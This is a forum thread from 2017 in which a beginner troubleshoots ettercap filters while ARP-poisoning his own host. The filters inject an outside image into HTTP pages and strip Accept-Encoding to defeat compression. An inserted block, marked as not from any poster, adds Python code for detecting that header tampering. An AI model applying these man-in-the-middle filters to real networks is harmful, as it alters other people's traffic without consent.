myhat, posted July 23, 2017

Noob here. Been trying to run some ettercap filters through my virtual machine while ARP-poisoning my host computer.

myhat, posted July 23, 2017

Here is the filter I'm using:

    if (ip.proto == TCP && tcp.src == 80) {
        replace("img src=", "img src=\"http://www.cranklin.com/mickey.png\" ");
        replace("IMG SRC=", "img src=\"http://www.cranklin.com/mickey.png\" ");
        msg("Filter Ran.\n");
    }

Everything seems to be working fine and no errors are popping up but when I go onto the internet on my host computer nothing seems to change.

myhat, posted July 23, 2017

Followed the instructions on this site perfectly: https://cranklin.wordpress.com/2011/10/13/prank-hacking-your-co-workers-for-fun-2/

i8igmac, posted July 23, 2017

All your traffic is gzip encoded; your filter must first prevent this so plain text traffic is visible to ettercap.

https://www.irongeek.com/i.php?page=security/ettercapfilter

myhat, posted July 23, 2017

Thank you for the response, but if you're referring to including this line of code

    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            # note: replacement string is same length as original string
            replace("Accept-Encoding", "Accept-Rubbish!");
            msg("zapped Accept-Encoding!\n");
        }
    }

I got the same results. Perhaps I should include more details. I'm running Kali, my ettercap is version 0.8.2, ip_forwarding is set to 1, and ettercap, when I run this code, tells me the filter has run; however, no changes occur to the target computer. Any ideas on what the problem could be?

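Added example, not from any poster in this thread: the same-length header rewrite in the filter above leaves a recognizable trace, so a web server or proxy can flag requests that were modified in transit. The function names and the sample requests are constructed for this illustration.

```python
# Added example: flag requests whose Accept-Encoding header name was overwritten in transit.
# All request samples below are constructed for illustration.

KNOWN_CODINGS = {"gzip", "deflate", "br", "zstd", "compress", "identity"}
NAME_LEN = len("Accept-Encoding")  # an in-place rewrite keeps this length

def parse_headers(raw: bytes):
    """Return [(name, value), ...] from the header block of a raw HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = []
    for line in head.split("\r\n")[1:]:      # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers

def carries_codings(value: str) -> bool:
    """True if the value lists at least one HTTP content coding."""
    tokens = (t.split(";")[0].strip().lower() for t in value.split(","))
    return any(t in KNOWN_CODINGS for t in tokens)

def find_mangled_accept_encoding(raw: bytes):
    """Return the suspicious header name, or None if the request looks untouched."""
    headers = parse_headers(raw)
    if any(n.lower() == "accept-encoding" for n, _ in headers):
        return None
    for name, value in headers:
        # A header of the same length that still carries a coding list is the trace
        # left by a same-length replace on the wire.
        if len(name) == NAME_LEN and carries_codings(value):
            return name
    return None

NORMAL = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
          b"Accept-Language: en-US,en;q=0.9\r\n"
          b"Accept-Encoding: gzip, deflate\r\n\r\n")
TAMPERED = NORMAL.replace(b"Accept-Encoding", b"Accept-Rubbish!")
NO_ENCODING = b"GET / HTTP/1.1\r\nHost: example.test\r\nAccept-Language: *\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("tampered", TAMPERED), ("none", NO_ENCODING)):
        print(label, "->", find_mangled_accept_encoding(req))
```

A client that simply sends no Accept-Encoding header is not flagged; only a same-length header that still carries a coding list is.
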
i8igmac, posted July 23, 2017 (edited July 23, 2017 by i8igmac)

If the traffic is encrypted with SSL or HSTS it won't work. Try using Internet Explorer and try multiple websites that are not encrypted.

IP forwarding like this?

    echo 1 > /proc/sys/net/ipv4/ip_forward

myhat, posted July 25, 2017

Yeah, tried it on multiple http websites and with Internet Explorer. I used nano /proc/sys/net/ipv4/ip_forward and changed it manually but that doesn't make a difference. Thanks again for the response though.